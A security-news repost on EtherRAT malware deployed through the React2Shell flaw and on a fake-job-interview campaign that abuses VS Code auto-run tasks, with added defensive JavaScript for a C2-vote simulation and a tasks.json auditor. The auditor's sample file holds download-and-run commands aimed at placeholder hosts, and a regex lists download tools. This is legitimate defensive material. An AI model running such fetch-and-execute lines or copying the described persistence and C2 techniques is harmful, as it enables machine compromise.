Cyber Web Spider Blog – News
North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware

Posted on December 9, 2025 By CWS

Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT.
"EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org," Sysdig said in a report published Monday.
The cloud security firm said the activity shows significant overlap with a long-running campaign codenamed Contagious Interview, which has been observed leveraging the EtherHiding technique to distribute malware since February 2025.
Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted via fake job interviews, coding assignments, and video assessments, leading to the deployment of malware. These efforts typically begin with a ruse that lures victims through platforms like LinkedIn, Upwork, or Fiverr, where the threat actors pose as recruiters offering lucrative job opportunities.
According to software supply chain security company Socket, it is one of the most prolific campaigns exploiting the npm ecosystem, highlighting the actors' ability to adapt to JavaScript- and cryptocurrency-centric workflows.

The attack chain begins with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant.
The shell script is retrieved using a curl command, with wget and python3 used as fallbacks. It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, after which it writes an encrypted blob and an obfuscated JavaScript dropper to disk. Once these steps are complete, it deletes the shell script to minimize the forensic trail and runs the dropper.

The primary purpose of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it using the downloaded Node.js binary. The malware is notable for using EtherHiding to fetch the C2 server URL from an Ethereum smart contract every five minutes, allowing the operators to update the URL easily, even if the current one is taken down.
"What makes this implementation unique is its use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints," Sysdig said. "EtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority."
"This consensus mechanism protects against multiple attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by running a rogue RPC node."
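To make the takedown arithmetic behind that quote concrete, here is an added JavaScript (Node.js) example written for this article; it is not Sysdig's code and not EtherRAT's. It implements a majority vote of the kind described and simulates constructed response sets, so no Ethereum or network access is involved. The article does not say how EtherRAT handles ties or endpoints that fail to answer; the strict-majority-of-configured-endpoints rule below is an assumption made here and is marked as such in the code.

```javascript
// Added example for this article (not Sysdig's or EtherRAT's code): a
// majority-vote resolver of the kind the quoted text describes, used to
// work out how many of the nine RPC endpoints an adversary would have to
// control (or knock offline) before the vote changes. Responses are
// constructed strings; no blockchain or network access is involved.

// Resolve one value from the responses of all configured endpoints.
// `responses` holds one entry per endpoint: a string, or null when that
// endpoint failed or timed out.
function majorityVote(responses) {
  const tally = new Map();
  for (const r of responses) {
    if (r === null || r === undefined) continue;
    tally.set(r, (tally.get(r) || 0) + 1);
  }
  let best = null;
  let bestCount = 0;
  for (const [value, count] of tally) {
    if (count > bestCount) {
      best = value;
      bestCount = count;
    }
  }
  // Assumption (the article does not say how ties or partial outages are
  // handled): demand a strict majority of all *configured* endpoints, so
  // that taking endpoints offline cannot lower the bar for a poisoned value.
  const needed = Math.floor(responses.length / 2) + 1;
  return bestCount >= needed ? best : null;
}

// Smallest number of endpoints an adversary must control to win the vote.
function endpointsNeededToOverride(total) {
  return Math.floor(total / 2) + 1;
}

// Build a constructed response set and resolve it: `rogue` endpoints return
// rogueUrl, `offline` endpoints return nothing, the rest return honestUrl.
function simulate({ total = 9, honestUrl, rogueUrl, rogue = 0, offline = 0 }) {
  const responses = [];
  for (let i = 0; i < total; i++) {
    if (i < rogue) responses.push(rogueUrl);
    else if (i < rogue + offline) responses.push(null);
    else responses.push(honestUrl);
  }
  return majorityVote(responses);
}

// Constructed values for the walkthrough (RFC 2606 reserved names).
const HONEST = 'https://c2.example/';
const SINKHOLE = 'https://sinkhole.invalid/';

// One or even four poisoned endpoints out of nine leave the result unchanged;
// only five do, and under the rule above four rogue plus one offline
// endpoint yields no result at all rather than a poisoned one.
const walkthrough = [1, 4, 5].map((rogue) => ({
  rogue,
  resolved: simulate({ honestUrl: HONEST, rogueUrl: SINKHOLE, rogue }),
}));
```

The practical consequence for defenders is the one the quote implies: sinkholing requires control of at least five of the nine endpoints or of the contract itself, which is why takedown effort is better spent on the contract address and the resolved C2 hosts than on any individual RPC provider.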
It is worth noting that a similar implementation was previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to deliver downloader malware to developer systems.
Once EtherRAT establishes contact with the C2 server, it enters a polling loop that executes every 500 milliseconds, interpreting any response longer than 10 characters as JavaScript code to be run on the infected machine. Persistence is achieved using five different methods:

Systemd consumer service
XDG autostart entry
Cron jobs
.bashrc injection
Profile injection

By using multiple mechanisms, the threat actors ensure the malware runs again after a system reboot and that they retain access to the infected systems. Another sign of the malware's sophistication is a self-update capability: it sends its own source code to an API endpoint, then overwrites itself with the new code received from the C2 server.
It then launches a new process with the updated payload. What is notable here is that the C2 returns a functionally identical but differently obfuscated version, potentially allowing it to bypass static signature-based detection.
In addition to the use of EtherHiding, the links to Contagious Interview stem from overlaps between the encrypted loader pattern used in EtherRAT and a known JavaScript information stealer and downloader named BeaverTail.

"EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations," Sysdig said.
"Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods."
Contagious Interview Shifts from npm to VS Code
The disclosure comes as OpenSourceMalware published details of a new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as part of a programming assignment and open the project in Microsoft Visual Studio Code (VS Code).
This results in the execution of a task defined in the repository's VS Code tasks.json file, because the task is configured with runOptions.runOn: 'folderOpen', causing it to run automatically as soon as the project is opened. The task is engineered to download a loader script using curl or wget, selected according to the operating system of the compromised host.
In the case of Linux, the next stage is a shell script that downloads and runs another shell script named "vscode-bootstrap.sh," which then fetches two more files, "bundle.json" and "env-setup.js," the latter of which serves as a launchpad for BeaverTail and InvisibleFerret.
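A cloned repository can be checked for this trigger before it is ever opened in the editor. The following is an added Node.js example written for this article; it is not OpenSourceMalware's code and not the campaign's own tasks.json. It parses a tasks.json file (VS Code accepts comments and trailing commas in it, so plain JSON.parse is not enough), reports every task set to run on folderOpen, and marks those whose command fetches remote content, including a per-OS override block of the kind that lets one task choose curl on Linux and a PowerShell download on Windows. The sample file and the hostnames in it are constructed (RFC 2606 reserved names), and the list of fetch commands is a starting heuristic, not a complete one.

```javascript
// Added example for this article (not OpenSourceMalware's code and not the
// campaign's own tasks.json): a pre-open audit of .vscode/tasks.json that
// reports tasks configured with runOptions.runOn "folderOpen" and marks those
// whose command pulls content from the network. Sample data is constructed.

// Strip // and /* */ comments outside string literals, then trailing commas.
function normalizeJsonc(text) {
  let out = '';
  let i = 0;
  let inString = false;
  while (i < text.length) {
    const c = text[i];
    const next = text[i + 1];
    if (inString) {
      out += c;
      if (c === '\\') { out += next || ''; i += 2; continue; }
      if (c === '"') inString = false;
      i += 1;
      continue;
    }
    if (c === '"') { inString = true; out += c; i += 1; continue; }
    if (c === '/' && next === '/') {
      while (i < text.length && text[i] !== '\n') i += 1;
      continue;
    }
    if (c === '/' && next === '*') {
      i += 2;
      while (i < text.length && !(text[i] === '*' && text[i + 1] === '/')) i += 1;
      i += 2;
      continue;
    }
    out += c;
    i += 1;
  }
  // Trailing-comma removal is a plain regex and would also fire on ",}" inside
  // a string literal; acceptable for an audit tool, not for a general parser.
  return out.replace(/,(\s*[}\]])/g, '$1');
}

// Commands that fetch remote content, on either platform family (heuristic).
const REMOTE_FETCH =
  /\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm|certutil|bitsadmin)\b/i;

// Join the task's command and args with any per-OS override block, since a
// task may choose curl or wget on Linux and a different command on Windows.
function taskCommandText(task) {
  const parts = [];
  const collect = (t) => {
    if (!t || typeof t !== 'object') return;
    if (typeof t.command === 'string') parts.push(t.command);
    if (Array.isArray(t.args)) parts.push(...t.args.filter((a) => typeof a === 'string'));
  };
  collect(task);
  for (const key of ['windows', 'linux', 'osx']) collect(task[key]);
  return parts.join(' ');
}

// Return one finding per task that VS Code would start automatically on open.
function auditTasksJson(text) {
  const doc = JSON.parse(normalizeJsonc(text));
  const findings = [];
  for (const task of Array.isArray(doc.tasks) ? doc.tasks : []) {
    const runOn = task.runOptions && task.runOptions.runOn;
    if (runOn !== 'folderOpen') continue;
    const command = taskCommandText(task);
    findings.push({
      label: task.label || '(unlabelled)',
      command,
      fetchesRemote: REMOTE_FETCH.test(command),
    });
  }
  return findings;
}

// Constructed sample modelled on the article's description.
const SAMPLE_TASKS_JSON = `{
  // VS Code tasks file (JSONC): comments and trailing commas are allowed
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "env-setup",
      "type": "shell",
      "command": "curl -fsSL https://loader.invalid/setup.sh | sh",
      "windows": {
        "command": "powershell -c \\"iwr https://loader.invalid/setup.ps1 | iex\\""
      },
      "runOptions": { "runOn": "folderOpen" },
    },
  ]
}`;
```

Run it as `auditTasksJson(fs.readFileSync('.vscode/tasks.json', 'utf8'))` on the clone; any folderOpen task that fetches remote content deserves a read of the script it pulls before the folder is opened at all. VS Code's Workspace Trust keeps automatic tasks from running in Restricted Mode, and the `task.allowAutomaticTasks` setting can disable them outright, which is the sensible default for a machine that opens third-party "assignment" repositories.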
OpenSourceMalware said it identified 13 different versions of this campaign spread across 27 different GitHub users and 11 different versions of BeaverTail. The earliest repository ("github[.]com/MentarisHub121/TokenPresaleApp") dates back to April 22, 2025, and the newest version ("github[.]com/eferos93/test4") was created on December 1, 2025.
"DPRK threat actors have flocked to Vercel, and are now using it almost exclusively," the OpenSourceMalware team said. "We don't know why, but Contagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers."

Source: The Hacker News. Tags: Actors, Deploy, EtherRAT, Exploit, Korea-linked, Malware, North, React2Shell
